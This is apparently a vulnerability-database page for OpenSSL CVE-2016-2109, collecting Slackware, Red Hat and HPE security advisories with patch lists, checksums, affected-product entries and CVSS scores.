Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1t-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1t-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1t-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1t-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2h-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2h-i586-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2h-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2h-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.0 packages: 033bd9509aeb07712e6bb3adf89c18e4 openssl-1.0.1t-i486-1_slack14.0.txz 9e91d781e33f7af80cbad08b245e84ed openssl-solibs-1.0.1t-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: e5c77ec16e3f2fcb2f1d53d84a6ba951 openssl-1.0.1t-x86_64-1_slack14.0.txz 2de7b6196a905233036d7f38008984bd openssl-solibs-1.0.1t-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 96dcae05ae2f585c30de852a55eb870f openssl-1.0.1t-i486-1_slack14.1.txz 59618b061e62fd9d73ba17df7626b2e7 openssl-solibs-1.0.1t-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: 3d5ebfce099917703d537ab603e58a9b openssl-1.0.1t-x86_64-1_slack14.1.txz bf3a6bbdbe835dd2ce73333822cc9f06 openssl-solibs-1.0.1t-x86_64-1_slack14.1.txz
Slackware -current packages: 4889a10c5f3aa7104167c7d50eedf7ea a/openssl-solibs-1.0.2h-i586-1.txz 8e3439f35c3cb4e11ca64eebb238a52f n/openssl-1.0.2h-i586-1.txz
Slackware x86_64 -current packages: b4a852bb7e86389ec228288ccb7e79bb a/openssl-solibs-1.0.2h-x86_64-1.txz bcf9dc7bb04173f002644e3ce33ab4ab n/openssl-1.0.2h-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1t-i486-1_slack14.1.txz openssl-solibs-1.0.1t-i486-1_slack14.1.txz
Then, reboot the machine or restart any network services that use OpenSSL.
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address.
References:
- CVE-2016-2107 - OpenSSL, Unauthorized disclosure of information
- CVE-2016-2106 - OpenSSL, Denial of Service (DoS)
- CVE-2016-2109 - OpenSSL, Denial of Service (DoS)
- CVE-2016-2105 - OpenSSL, Denial of Service (DoS)
- CVE-2016-3739 - cURL and libcurl, Remote code execution
- CVE-2016-5388 - "HTTPoxy", Apache Tomcat
- CVE-2016-5387 - "HTTPoxy", Apache HTTP Server
- CVE-2016-5385 - "HTTPoxy", PHP
- CVE-2016-4543 - PHP, multiple impact
- CVE-2016-4071 - PHP, multiple impact
- CVE-2016-4072 - PHP, multiple impact
- CVE-2016-4542 - PHP, multiple impact
- CVE-2016-4541 - PHP, multiple impact
- CVE-2016-4540 - PHP, multiple impact
- CVE-2016-4539 - PHP, multiple impact
- CVE-2016-4538 - PHP, multiple impact
- CVE-2016-4537 - PHP, multiple impact
- CVE-2016-4343 - PHP, multiple impact
- CVE-2016-4342 - PHP, multiple impact
- CVE-2016-4070 - PHP, Denial of Service (DoS)
- CVE-2016-4393 - PSRT110263, XSS vulnerability
- CVE-2016-4394 - PSRT110263, HSTS vulnerability
- CVE-2016-4395 - ZDI-CAN-3722, PSRT110115, Buffer Overflow
- CVE-2016-4396 - ZDI-CAN-3730, PSRT110116, Buffer Overflow
- PSRT110145
- PSRT110263
- PSRT110115
- PSRT110116
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: Red Hat JBoss Core Services Apache HTTP 2.4.23 Release Advisory ID: RHSA-2016:2957-01 Product: Red Hat JBoss Core Services Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-2957.html Issue date: 2016-12-15 CVE Names: CVE-2012-1148 CVE-2014-3523 CVE-2014-8176 CVE-2015-0209 CVE-2015-0286 CVE-2015-3185 CVE-2015-3194 CVE-2015-3195 CVE-2015-3196 CVE-2015-3216 CVE-2016-0702 CVE-2016-0705 CVE-2016-0797 CVE-2016-0799 CVE-2016-1762 CVE-2016-1833 CVE-2016-1834 CVE-2016-1835 CVE-2016-1836 CVE-2016-1837 CVE-2016-1838 CVE-2016-1839 CVE-2016-1840 CVE-2016-2105 CVE-2016-2106 CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 CVE-2016-2177 CVE-2016-2178 CVE-2016-2842 CVE-2016-3627 CVE-2016-3705 CVE-2016-4447 CVE-2016-4448 CVE-2016-4449 CVE-2016-4459 CVE-2016-4483 CVE-2016-5419 CVE-2016-5420 CVE-2016-6808 CVE-2016-7141 CVE-2016-8612 =====================================================================
- Summary:
Red Hat JBoss Core Services httpd 2.4.23 is now available from the Red Hat Customer Portal for Solaris and Microsoft Windows systems.
Red Hat Product Security has rated this release as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Description:
This release of Red Hat JBoss Core Services httpd 2.4.23 serves as a replacement for JBoss Core Services Apache HTTP Server 2.4.6.
Security Fix(es):
-
This update fixes several flaws in OpenSSL. (CVE-2014-8176, CVE-2015-0209, CVE-2015-0286, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196, CVE-2015-3216, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109, CVE-2016-2177, CVE-2016-2178, CVE-2016-2842)
-
This update fixes several flaws in libxml2. (CVE-2016-1762, CVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)
-
This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420, CVE-2016-7141)
-
This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)
-
This update fixes two flaws in mod_cluster. (CVE-2016-4459, CVE-2016-8612)
-
A buffer overflow flaw when concatenating virtual host names and URIs was fixed in mod_jk. (CVE-2016-6808)
-
A memory leak flaw was fixed in expat. (CVE-2012-1148)
Red Hat would like to thank the OpenSSL project for reporting CVE-2014-8176, CVE-2015-0286, CVE-2016-2108, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842. The CVE-2016-4459 issue was discovered by Robert Bost (Red Hat). Upstream acknowledges Stephen Henson (OpenSSL development team) as the original reporter of CVE-2015-0286; Huzaifa Sidhpurwala (Red Hat), Hanno BAPck, and David Benjamin (Google) as the original reporters of CVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2105, CVE-2016-2106, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842; Juraj Somorovsky as the original reporter of CVE-2016-2107; Yuval Yarom (University of Adelaide and NICTA), Daniel Genkin (Technion and Tel Aviv University), and Nadia Heninger (University of Pennsylvania) as the original reporters of CVE-2016-0702; and Adam Langley (Google/BoringSSL) as the original reporter of CVE-2016-0705.
See the corresponding CVE pages linked to in the References section for more information about each of the flaws listed in this advisory. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
After installing the updated packages, the httpd daemon will be restarted automatically. Bugs fixed (https://bugzilla.redhat.com/):
801648 - CVE-2012-1148 expat: Memory leak in poolGrow 1121519 - CVE-2014-3523 httpd: WinNT MPM denial of service 1196737 - CVE-2015-0209 openssl: use-after-free on invalid EC private key import 1202366 - CVE-2015-0286 openssl: invalid pointer use in ASN1_TYPE_cmp() 1227574 - CVE-2015-3216 openssl: Crash in ssleay_rand_bytes due to locking regression 1228611 - CVE-2014-8176 OpenSSL: Invalid free in DTLS 1243888 - CVE-2015-3185 httpd: ap_some_auth_required() does not properly indicate authenticated request in 2.4 1288320 - CVE-2015-3194 OpenSSL: Certificate verify crash with missing PSS parameter 1288322 - CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak 1288326 - CVE-2015-3196 OpenSSL: Race condition handling PSK identify hint 1310596 - CVE-2016-0705 OpenSSL: Double-free in DSA code 1310599 - CVE-2016-0702 OpenSSL: Side channel attack on modular exponentiation 1311880 - CVE-2016-0797 OpenSSL: BN_hex2bn/BN_dec2bn NULL pointer deref/heap corruption 1312219 - CVE-2016-0799 OpenSSL: Fix memory issues in BIO_*printf functions 1314757 - CVE-2016-2842 openssl: doapr_outch function does not verify that certain memory allocation succeeds 1319829 - CVE-2016-3627 libxml2: stack exhaustion while parsing xml files in recovery mode 1330101 - CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data 1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder 1331426 - CVE-2016-2107 openssl: Padding oracle in AES-NI CBC MAC check 1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow 1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow 1332443 - CVE-2016-3705 libxml2: stack overflow before detecting invalid XML file 1332820 - CVE-2016-4483 libxml2: out-of-bounds read 1338682 - CVE-2016-1833 libxml2: Heap-based buffer overread in htmlCurrentChar 1338686 - CVE-2016-4447 libxml2: Heap-based buffer underreads due to xmlParseName 1338691 - CVE-2016-1835 libxml2: Heap use-after-free in xmlSAX2AttributeNs 1338696 - CVE-2016-1837 libxml2: Heap use-after-free in htmlPArsePubidLiteral and htmlParseSystemiteral 1338700 - CVE-2016-4448 libxml2: Format string vulnerability 1338701 - CVE-2016-4449 libxml2: Inappropriate fetch of entities content 1338702 - CVE-2016-1836 libxml2: Heap use-after-free in xmlDictComputeFastKey 1338703 - CVE-2016-1839 libxml2: Heap-based buffer overread in xmlDictAddString 1338705 - CVE-2016-1838 libxml2: Heap-based buffer overread in xmlPArserPrintFileContextInternal 1338706 - CVE-2016-1840 libxml2: Heap-buffer-overflow in xmlFAParserPosCharGroup 1338708 - CVE-2016-1834 libxml2: Heap-buffer-overflow in xmlStrncat 1338711 - CVE-2016-1762 libxml2: Heap-based buffer-overread in xmlNextChar 1341583 - CVE-2016-4459 mod_cluster: Buffer overflow in mod_manager when sending request with long JVMRoute 1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase 1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation 1362183 - CVE-2016-5419 curl: TLS session resumption client cert bypass 1362190 - CVE-2016-5420 curl: Re-using connection with wrong client cert 1373229 - CVE-2016-7141 curl: Incorrect reuse of client certificates 1382352 - CVE-2016-6808 mod_jk: Buffer overflow when concatenating virtual host name and URI 1387605 - CVE-2016-8612 JBCS mod_cluster: Protocol parsing logic error
- JIRA issues fixed (https://issues.jboss.org/):
JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0] JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service
- References:
https://access.redhat.com/security/cve/CVE-2012-1148 https://access.redhat.com/security/cve/CVE-2014-3523 https://access.redhat.com/security/cve/CVE-2014-8176 https://access.redhat.com/security/cve/CVE-2015-0209 https://access.redhat.com/security/cve/CVE-2015-0286 https://access.redhat.com/security/cve/CVE-2015-3185 https://access.redhat.com/security/cve/CVE-2015-3194 https://access.redhat.com/security/cve/CVE-2015-3195 https://access.redhat.com/security/cve/CVE-2015-3196 https://access.redhat.com/security/cve/CVE-2015-3216 https://access.redhat.com/security/cve/CVE-2016-0702 https://access.redhat.com/security/cve/CVE-2016-0705 https://access.redhat.com/security/cve/CVE-2016-0797 https://access.redhat.com/security/cve/CVE-2016-0799 https://access.redhat.com/security/cve/CVE-2016-1762 https://access.redhat.com/security/cve/CVE-2016-1833 https://access.redhat.com/security/cve/CVE-2016-1834 https://access.redhat.com/security/cve/CVE-2016-1835 https://access.redhat.com/security/cve/CVE-2016-1836 https://access.redhat.com/security/cve/CVE-2016-1837 https://access.redhat.com/security/cve/CVE-2016-1838 https://access.redhat.com/security/cve/CVE-2016-1839 https://access.redhat.com/security/cve/CVE-2016-1840 https://access.redhat.com/security/cve/CVE-2016-2105 https://access.redhat.com/security/cve/CVE-2016-2106 https://access.redhat.com/security/cve/CVE-2016-2107 https://access.redhat.com/security/cve/CVE-2016-2108 https://access.redhat.com/security/cve/CVE-2016-2109 https://access.redhat.com/security/cve/CVE-2016-2177 https://access.redhat.com/security/cve/CVE-2016-2178 https://access.redhat.com/security/cve/CVE-2016-2842 https://access.redhat.com/security/cve/CVE-2016-3627 https://access.redhat.com/security/cve/CVE-2016-3705 https://access.redhat.com/security/cve/CVE-2016-4447 https://access.redhat.com/security/cve/CVE-2016-4448 https://access.redhat.com/security/cve/CVE-2016-4449 https://access.redhat.com/security/cve/CVE-2016-4459 https://access.redhat.com/security/cve/CVE-2016-4483 https://access.redhat.com/security/cve/CVE-2016-5419 https://access.redhat.com/security/cve/CVE-2016-5420 https://access.redhat.com/security/cve/CVE-2016-6808 https://access.redhat.com/security/cve/CVE-2016-7141 https://access.redhat.com/security/cve/CVE-2016-8612 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=core.service.apachehttp&downloadType=distributions&version=2.4.23 https://access.redhat.com/documentation/en/red-hat-jboss-core-services-apache-http-server/version-2.4.23/apache-http-server-2423-release-notes/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc
Show details on source website{
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"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:nec:enterprise_directoryserver",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:nec:enterpriseidentitymanager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:nec:esmpro_serveragent",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:nec:esmpro_serveragentservice",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:nec:express5800",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:nec:ip38x_1200",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:nec:ip38x_1210",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:nec:ip38x_3000",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:nec:ip38x_3500",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:nec:ip38x_5000",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:nec:ip38x_810",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:nec:ip38x_fw120",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:nec:ip38x_n500",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:nec:ip38x_sr100",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:nec:secureware_pki_application_development_kit",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:nec:univerge",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:nec:webotx_application_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:nec:webotx_enterprise_service_bus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:nec:websam",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:cosminexus_application_server_enterprise",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:cosminexus_application_server_standard",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:cosminexus_application_server_version_5",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:cosminexus_developer_light_version_6",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:cosminexus_developer_professional_version_6",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:cosminexus_developer_standard_version_6",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:cosminexus_developer_version_5",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:cosminexus_primary_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:hitachi_web_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:ucosminexus_application_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:ucosminexus_application_server_enterprise",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:ucosminexus_application_server_smart_edition",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:ucosminexus_application_server_standard",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:ucosminexus_developer",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:ucosminexus_developer_light",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:ucosminexus_developer_standard",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:ucosminexus_primary_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:ucosminexus_service_architect",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:hitachi:ucosminexus_service_platform",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002476"
}
]
},
"credits": {
"_id": null,
"data": "Brian Carpenter",
"sources": [
{
"db": "BID",
"id": "87940"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-083"
}
],
"trust": 0.9
},
"cve": "CVE-2016-2109",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2016-2109",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2016-2109",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-2109",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2016-2109",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201605-083",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2016-2109",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-2109"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-083"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002476"
},
{
"db": "NVD",
"id": "CVE-2016-2109"
}
]
},
"description": {
"_id": null,
"data": "The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in the ASN.1 BIO implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (memory consumption) via a short invalid encoding. OpenSSL is prone to a local denial-of-service vulnerability. \nAn attacker may exploit this issue to crash the application or consume excessive amount of data, resulting in denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03756en_us\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: hpesbhf03756en_us\nVersion: 1\n\nHPESBHF03756 rev.1 - HPE Network Products including Comware 7, iMC, and VCX\nrunning OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive\nInformation\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2017-06-05\nLast Updated: 2017-06-05\n\nPotential Security Impact: Remote: Denial of Service (DoS), Disclosure of\nSensitive Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities with OpenSSL have been addressed for HPE\nnetwork products including Comware 7, iMC, and VCX. The vulnerabilities could\nbe remotely exploited resulting in Denial of Service (DoS) or disclosure of\nsensitive information. \n\nReferences:\n\n - CVE-2016-2105 - Remote Denial of Service (DoS)\n - CVE-2016-2106 - Remote Denial of Service (DoS)\n - CVE-2016-2107 - Remote disclosure of sensitive information\n - CVE-2016-2108 - Remote Denial of Service (DoS)\n - CVE-2016-2109 - Remote Denial of Service (DoS)\n - CVE-2016-2176 - Remote Denial of Service (DoS)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - VCX Products All versions - Please refer to the RESOLUTION below for a\nlist of updated products. \n - Comware v7 (CW7) Products All versions - Please refer to the RESOLUTION\nbelow for a list of updated products. \n - HP Intelligent Management Center (iMC) All versions - Please refer to the\nRESOLUTION below for a list of updated products. \n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2016-2105\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2016-2106\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n CVE-2016-2107\n 3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\n 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)\n\n CVE-2016-2108\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n CVE-2016-2109\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)\n\n CVE-2016-2176\n 6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L\n 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following software updates available to resolve the\nvulnerabilities in the Comware 7, iMC and VCX products running OpenSSL. \n\n**COMWARE 7 Products**\n\n + 12500 (Comware 7) - Version: R7377P02\n * HP Network Products\n - JC072B HP 12500 Main Processing Unit\n - JC085A HP A12518 Switch Chassis\n - JC086A HP A12508 Switch Chassis\n - JC652A HP 12508 DC Switch Chassis\n - JC653A HP 12518 DC Switch Chassis\n - JC654A HP 12504 AC Switch Chassis\n - JC655A HP 12504 DC Switch Chassis\n - JF430A HP A12518 Switch Chassis\n - JF430B HP 12518 Switch Chassis\n - JF430C HP 12518 AC Switch Chassis\n - JF431A HP A12508 Switch Chassis\n - JF431B HP 12508 Switch Chassis\n - JF431C HP 12508 AC Switch Chassis\n - JG497A HP 12500 MPU w/Comware V7 OS\n - JG782A HP FF 12508E AC Switch Chassis\n - JG783A HP FF 12508E DC Switch Chassis\n - JG784A HP FF 12518E AC Switch Chassis\n - JG785A HP FF 12518E DC Switch Chassis\n - JG802A HP FF 12500E MPU\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 10500 (Comware 7) - Version: R7184\n * HP Network Products\n - JC611A HP 10508-V Switch Chassis\n - JC612A HP 10508 Switch Chassis\n - JC613A HP 10504 Switch Chassis\n - JC748A HP 10512 Switch Chassis\n - JG608A HP FlexFabric 11908-V Switch Chassis\n - JG609A HP FlexFabric 11900 Main Processing Unit\n - JG820A HP 10504 TAA Switch Chassis\n - JG821A HP 10508 TAA Switch Chassis\n - JG822A HP 10508-V TAA Switch Chassis\n - JG823A HP 10512 TAA Switch Chassis\n - JG496A HP 10500 Type A MPU w/Comware v7 OS\n - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n - JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System\nMain Processing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5900/5920 (Comware 7) - Version: R2422P02\n * HP Network Products\n - JC772A HP 5900AF-48XG-4QSFP+ Switch\n - JG296A HP 5920AF-24XG Switch\n - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n - JG555A HP 5920AF-24XG TAA Switch\n - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR1000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG875A HP MSR1002-4 AC Router\n - JH060A HP MSR1003-8S AC Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR2000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG411A HP MSR2003 AC Router\n - JG734A HP MSR2004-24 AC Router\n - JG735A HP MSR2004-48 Router\n - JG866A HP MSR2003 TAA-compliant AC Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR3000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG404A HP MSR3064 Router\n - JG405A HP MSR3044 Router\n - JG406A HP MSR3024 AC Router\n - JG407A HP MSR3024 DC Router\n - JG408A HP MSR3024 PoE Router\n - JG409A HP MSR3012 AC Router\n - JG410A HP MSR3012 DC Router\n - JG861A HP MSR3024 TAA-compliant AC Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + MSR4000 (Comware 7) - Version: R0306P52\n * HP Network Products\n - JG402A HP MSR4080 Router Chassis\n - JG403A HP MSR4060 Router Chassis\n - JG412A HP MSR4000 MPU-100 Main Processing Unit\n - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + VSR (Comware 7) - Version: E0324\n * HP Network Products\n - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 7900 (Comware 7) - Version: R2152\n * HP Network Products\n - JG682A HP FlexFabric 7904 Switch Chassis\n - JG841A HP FlexFabric 7910 Switch Chassis\n - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n * CVEs\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2176\n + 5130 (Comware 7) - Version: R3115\n * HP Network Products\n - JG932A HP 5130-24G-4SFP+ EI Switch\n - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n - JG934A HP 